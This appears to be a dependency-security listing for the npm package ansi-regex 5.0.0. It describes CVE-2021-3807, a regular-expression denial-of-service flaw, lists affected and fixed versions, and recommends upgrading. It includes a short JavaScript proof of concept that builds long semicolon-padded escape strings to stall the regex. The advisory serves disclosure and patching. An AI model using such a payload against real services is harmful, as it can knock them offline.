NodeJS/ansi-regex/5.0.0


Regular expression for matching ANSI escape codes

https://www.npmjs.com/package/ansi-regex
MIT

1 Security Vulnerabilities

Inefficient Regular Expression Complexity in chalk/ansi-regex

Published date: 2021-09-20T20:20:09Z
CVE: CVE-2021-3807
Links:

ansi-regex is vulnerable to Inefficient Regular Expression Complexity which could lead to a denial of service when parsing invalid ANSI escape codes.

Proof of Concept js import ansiRegex from 'ansi-regex'; for(var i = 1; i <= 50000; i++) { var time = Date.now(); var attack_str = "\u001B["+";".repeat(i*10000); ansiRegex().test(attack_str) var time_cost = Date.now() - time; console.log("attack_str.length: " + attack_str.length + ": " + time_cost+" ms") } The ReDOS is mainly due to the sub-patterns [[\\]()#;?]* and (?:;[-a-zA-Z\\d\\/#&.:=?%@~_]*)*

Affected versions: ["3.0.0", "4.0.0", "4.1.0", "5.0.0", "6.0.0"]
Secure versions: [0.1.0, 0.2.0, 0.2.1, 1.0.0, 1.1.0, 1.1.1, 2.0.0, 2.1.1, 6.0.1, 5.0.1, 4.1.1, 3.0.1]
Recommendation: Update to version 6.0.1.

17 Other Versions

Version License Security Released
6.0.1 MIT 2021-09-10 - 20:25 over 2 years
6.0.0 MIT 1 2021-04-16 - 06:02 almost 3 years
5.0.1 MIT 2021-09-14 - 15:55 over 2 years
5.0.0 MIT 1 2019-10-04 - 11:29 over 4 years
4.1.1 MIT 2022-03-12 - 03:08 about 2 years
4.1.0 MIT 1 2019-03-08 - 06:14 about 5 years
4.0.0 MIT 1 2018-09-18 - 08:18 over 5 years
3.0.1 MIT 2022-03-27 - 13:29 about 2 years
3.0.0 MIT 1 2017-06-20 - 19:03 almost 7 years
2.1.1 MIT 2017-01-14 - 03:09 about 7 years
2.0.0 MIT 2015-06-30 - 16:07 over 8 years
1.1.1 MIT 2015-02-22 - 09:24 about 9 years
1.1.0 MIT 2014-08-30 - 12:38 over 9 years
1.0.0 MIT 2014-08-13 - 13:29 over 9 years
0.2.1 MIT 2014-06-20 - 16:44 almost 10 years
0.2.0 MIT 2014-06-14 - 01:12 almost 10 years
0.1.0 MIT 2014-06-03 - 16:59 almost 10 years